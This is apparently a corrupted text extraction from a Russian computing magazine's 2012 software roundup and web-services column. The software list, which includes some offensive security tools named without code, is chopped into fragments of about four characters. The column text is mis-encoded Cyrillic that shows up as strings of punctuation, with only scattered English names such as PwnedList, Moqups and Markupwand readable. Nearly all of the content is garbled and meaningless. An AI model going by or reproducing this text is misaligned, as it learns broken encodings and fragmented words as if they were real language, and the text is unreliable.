
diou

s 0.

1Ja

vaSn

oop

1.1

RC2

OSFo

rens

ics

1.1.

1002

Quar

ks P

wDu

mp

0.2b

Scyl

la 0

.6sp

tool

kit 0

.60

Virt

ualK

D 2.

7W

S-At

tack

er 1

.1XS

SF 2

.2

>Sys

tem

AllO

ff 4.

1Di

sk In

vest

igat

or 1

.31

Driv

erId

entif

ier

4.1

Inst

all M

onito

r 1.

1IS

OBud

dy 1

.1.1

.3Pa

rtiti

on W

izar

d 7.

5Pr

ivaZ

er 1

.2.1

6Pr

oces

s Ha

cker

2.2

8Qu

ick

Cliq

2.0

.6Sa

Back

up 0

.9.5

.8TC

CLE

13.0

USB

Obliv

ion

1.8.

0.0

Win

dow

s Su

rfac

e Sc

anne

r 2.

20

>Dai

lySo

ft7-

Zip

9.20

DAEM

ON T

ools

Lite

4.4

5.4

Far

Man

ager

v2.

0 bu

ild 1

807

x86

Fire

fox

14.0

.1fo

obar

2000

1.1

.13

Goog

le C

hrom

e 21

K-Li

te M

ega

Code

c Pa

ck 9

.1.0

Mira

nda

IM 0

.10.

0N

otep

ad++

6.1

.5Op

era

12.0

1Pu

TTY

0.62

Skyp

e 5.

8Sy

sint

erna

ls S

uite

Tota

l Com

man

der

8.01

Unlo

cker

1.9

.1uT

orre

nt 3

.2Xn

View

1.9

9 W

irele

ssKe

yVie

w

1.5.

5

>>UN

IX>>

Desk

top

AbiW

ord

2.8.

6Fl

oola

201

2r1

Foto

xx 1

2.08

Free

Arc

0.66

6Fr

inik

a 0.

7.1

gLab

els

3.0.

0Gr

amps

3.4

.0ke

yTou

ch 2

.4.1

Laun

chy

2.5

LuxR

ende

r 1.

0RC3

Met

rom

ap 0

.1.4

PiTi

Vi 0

.15.

2Qm

mp

0.6

Sage

5.2

Sim

pleB

urn

1.6.

4so

undK

onve

rter

1.6

.3

>Dev

elBl

ackt

oolk

it 1.

0.6

Blitz

pp 0

.10

Brac

kets

10

Code

lite

4.0.

5589

Dom

pdf 0

.5.2

Dpkt

1.7

Eclip

se 4

.2Go

ogle

-api

-pyt

hon-

clie

nt 1

.0c2

Groo

vy 2

.0Ja

vacs

v 2.

1Js

vk 3

.7.1

Open

laye

rs 2

.12

Php-

mob

ile-d

etec

t 2.0

.9Pr

ado3

3.2

.0Ro

ckm

ongo

1.1

.2Ta

ffydb

Ultim

ate-

htm

l5-f

ram

ewor

k 2.

0.1

Web

page

test

2.6

>Net

Auto

ssh

1.4c

Bals

a 2.

4.12

Bit-

Twis

t 2.0

BitS

torm

Lite

0.2

qCl

ipGr

ab 3

.2.0

.7Dn

s2tc

p 0.

5.2

Fire

fox

14.0

.1Go

ogle

Chr

ome

21M

umbl

e 1.

2.3

Net

Hogs

0.8

.0N

OC 0

.7.4

Oper

a 12

.01

Rss-

Awar

e 20

1105

01Sy

lphe

ed 3

.2Tu

rpia

l 1.6

.9Ya

rssr

0.2

.2

>Sec

urity

fwkn

op 2

.0.1

Ghos

t Phi

sher

1.4

4hi

diou

s 0.

1Ja

vaSn

oop

1.1

RC2

smbe

xec

1.0.

9So

cial

Eng

inee

r To

olki

t 3.5

.1sp

tool

kit 0

.60

Stilt

wal

ker

3Vo

IP H

oppe

r 2.

04W

S-At

tack

er 1

.1XS

SF 2

.2

>Ser

ver

Apac

he 2

.4.2

BIN

D 9.

9.1

CUPS

1.5

.4DH

CP 4

.2.4

Floc

kDB

1.8.

5JB

ossA

S 7.

1.2

Luce

ne 3

.6.1

Open

LDAP

2.4

.32

Open

SSH

6.0

Open

VPN

2.2

.2Po

stfix

2.9

.4Po

stgr

eSQL

9.1

.4Sa

mba

3.6

.6Se

ndm

ail 8

.14.

5Sq

uid

3.1.

20To

mca

t 7.0

.29

>Sys

tem

Aman

da 3

.3.2

AMD

Cata

lyst

12.

6Ba

cula

5.2

.10

Barm

an 1

.0Co

nky

1.9.

0Gr

ub 2

.0HD

FS 1

.0.3

Hear

tbea

t 3.0

.5Ia

t 0.1

.7Li

nux

Kern

el 3

.4.7

Mun

in 2

.0.4

Net

XMS

1.2.

2N

vidi

a 30

2.17

Sadm

s 2.

0.15

bSe

ntin

ella

0.9

.0Sl

ony-

1 2.

1.1

>X-d

istr

Mag

eia

2

>>M

ACAu

rora

Fox

16.0

a2Ch

amel

eon

SSD

Optim

izer

0.9

.3Di

sco

1.0.

3Go

ogle

Mus

ic M

anag

er 1

.0.3

7.25

2Jo

nDoF

oxLi

on D

iskM

aker

2.0

Mac

Port

s 2.

1.2

Net

New

sWire

3.3

.1N

etSp

ot 1

.3.3

66Ph

oeni

x Sl

ides

1.2

.7Pl

ain

Clip

2.4

.4SQ

LEdi

tor

1.7.

18Tu

nnel

blic

k 3.

3b12

Twee

tbot

0.6

.3W

indo

ws

Mig

ratio

n As

sist

ant

1.0.

1xA

CT 2

.19

FAQ

!"#$% 09 /164/ 2012144

PWNEDLIST pwnedlist.com!"#$%& '&(()* + ,#-+.,&* +-/'# Last.fm .0. Steam 1(/2.1 %&3#",4 (# "&%.1 53 . ,"-&6-()1 ,/7)".#1, . 8/09:/+&"#0. (# +,#2'& 8/(.1&;", $"/ ,"/." ,1#(."9 8&-/09 % 4<.%5 . +%0;$."9 '#"&0.:&=.; ,$#"& + 7&(%#. >#-+., PwnedList 8-#'0&2&#" 8-/+#-."9, (# :&"-/(50. 0. *&%#-,%.# &"&%. (#8-.%/,(/+#((/,"9 %/(%-#"(/ +&6.* '&(()*. ?04 @"/2/ '/,"&"/$(/ +7."9 &'-#, @0#%"-/((/A 8/$"), & ,#-+., 8-/+#-." #2/ 8/ ,+/#A 7&:# .: 8/$". 25 1.00./(/+ :&8.,#A. B&-&(/.%. 1/25" 7)"9 ,8/%/A() — / PwnedList 8.,&0. "&%.# .:'&-(.4, %&% Forbes . ZDNet, & :(&$.", @"/ (# /$#-#'(&4 0/+56%&. C'(&%/ #,0. @"/2/ (#'/,"&-"/$(/, .1#A0 1/3(/ 8#-#'&"9 + +.'# *#6& SHA-512 (+/,8/09:/+&+6.,9, (&8-.1#-, +/" @".1 %&09%504"/-/1: hash.online-convert.com). D&%3# ,#-+., 8-#'0&2&#" :&-#2.,"-.-/+&(()1 8/09:/+&"#041 5+#'/10#(.4 / 8/8&'&(.. + 7&:5, /7(/+04#15; 8/,0# %&3'/A (/+/A &"&%..

WWW2

!"#$"%&&" "'&"()%*+,% ',-, .+*/)"( 0*1$( 2$*3*4 5,&&67 # 8"82)%1&67 #*1(.#"(

SECURE SHELL goo.gl/JMWpbSecure Shell — -&,6.-#(.# '04 Google Chrome, -&:-&7/"&((/# ,&1/A %/18&(.#A, %/"/--/# 8/:+/04#" 8/'%0;$&"9,4 8/ SSH % 5'&0#((/A 1&6.(# 8-41/ .: +%0&'%. 7-&5:#-&. B0&2.( 8-#',"&+04#" ,/7/A 8/-".-/+&(()A OpenSSH . "#-1.(&0 hterm (+,# 70&2/'&-4 "#*(/0/2.. Native Client), 8/@"/15 -&7/"&#" 7),"-/ . ,"&7.09(/. E#'/,"&"%/1 4+04#",4 "/, $"/ (&,"-/A%. '/,"58() "/09%/ $#-#: %/(,/09 JavaScript + ,&1/1 Chrome (8/'--/7(## — + .(,"-5%=.. /" -&:-&7/"$.%/+ goo.gl/m6Nj8). > '-52/A ,"/-/(), @"/ 5'/7(/# -#6#(.# «(& +,4%.A ,05$&A», 8/:+/04;<## 8/'%0;$."9,4 % ,+/#15 ,#-+#-5 .: 0;7/2/ 1#,"&, 2'# #,"9 '/,"58 % >#".. E# *+&"&#" 8/0(/=#((/2/ «7-#0/%&» '04 *-&(#(.4 .(F/-1&=.. / */,"&* . %0;$&*, (/ &'-#,& ,#-+#-/+ 1/3(/ ,/*-&(4"9 + +.'# :&%0&'/% 7-&5:#-& . ,.(*-/(.:.-/+&"9 1#3'5 1&6.(&1. 8/09:/+&"#04.SSH-4).*&$ ( (.5* 1,#9.1*&.% 5)% Google Chrome

MOQUPS moqups.com> %&3')1 '(#1 8/4+04#",4 +,# 7/096# ,#-+.,/+ . 8-.0/3#(.A '04 8-/"/".8.-/+&-(.4, 8/:+/04;<.* 7),"-/ (&7-/,&"9 @,%.: 8-#'8/0&2&#1/2/ @%-&(& 8-.0/3#(.4 .0. +#7-,#-+.,&. G&% .:+#,"(/, %&-".(%& 05$6# "),4$. ,0/+, . 05$6#, $"/7) /(& 7)0& ,'#0&(& (# -5$%/A (& ,&0F#"%#. H#,80&"()A ,#-+., Moqups 8/:+/04#" ,/:'&+&"9 @,%.: .("#-F#A,& ,&A"&, 8-.0/3#(.4 .0. '&3# 8-/2-&11) '04 iPhone . 8/05$."9 %&-".(%5 + PDF .0. PNG, %/"/-5; 1/3(/ 8/%&:&"9 :&%&:$.%5 .0. %/00#2#-F-/("#('<.%5. I (&7/-# #,"9 +,# 1/'()# @0#1#("), +%0;$&4 «*0#7()# %-/6%.» . «-.77/()», & :&-#2.,"-.--/+&(()# 8/09:/+&"#0. 1/25" '/7&+04"9 ,/7,"+#(()# @0#1#("). C7J#%") (& -.,5(%# 0#2%/ 8-.+4:)+&;",4 % ,*#1#, 2-588.-5;",4 . /-2&(.:5;",4 + ,0/.. B-. @"/1 ,-#'& 8/:+/04#" ,'#0&"9 @,%.: +,#* @%-&(/+ .("#-F#A,&, /7/:(&$.+ 8#-#*/') 1#3'5 (.1..:5"'&6/ (*'-#*1(.# 5)% 81"$"$.8.1"(,&.% .&$*1;*/#"(

81.)"0*&./ . (*'-#,/$"(

MARKUPWAND markupwand.comC7<#(.# '.:&A(#-/+ . +#-,"&09<.%/+ — ,0/3()A 8-/=#,,, 8/0()A %/(F0.%"/+ . +:&.1()* 58-#%/+. G/(#$(&4 =#09 @"/2/ '.&0/2& — 8-#+-&<#(.# PSD-1&%#"& + 2/"/+)A %/', ., $"/7) '/7."9,4 @"/2/, */-/6. 0;7)# 1#"/'). I#-,"&09<.%., 3#0&;<.# (#1(/2/ 58-/,"."9 ,#7# 3.:(9, 1/25" +/,8/09:/+&"9,4 ,#-+.,/1 Markupwand. C( &+"/1&".$#,%. ,%/(+#-".-5#" F&A0 PSD + &%%5-&"()A %/', , %/"/-)1 53# 1/3(/ 75'#" -&7/"&"9. B-. @"/1 8/05$&#",4 $.,")A . +&0.'()A HTML . CSS, /F/-10#(()A . ,%/(+#-".-/+&(()A 8-. 8/-1/<. ,+4:%. SASS . Compass, — @"/ 8/+)6&#" $."&#1/,"9. G/(#$(/, +,# @"/ (# 1/3#" .:-7&+."9 /" -5$(/A -&7/"), (/ "/2'& +#-,"&09<.%. (# 7)0. 7) (53(), +#-(/? K '.:&A(#-&1 ,"/." /:(&%/1."9,4 , 8-&+.0&1. */-/6#2/ "/(& 8-. 8/'2/"/+%# PSD-1&%#"& (ilovepsd.ru).<*'-#*1(.#, 4"&(*1$.12=>./ PSD-+,4*$6 #,/$, ( HTML-4"5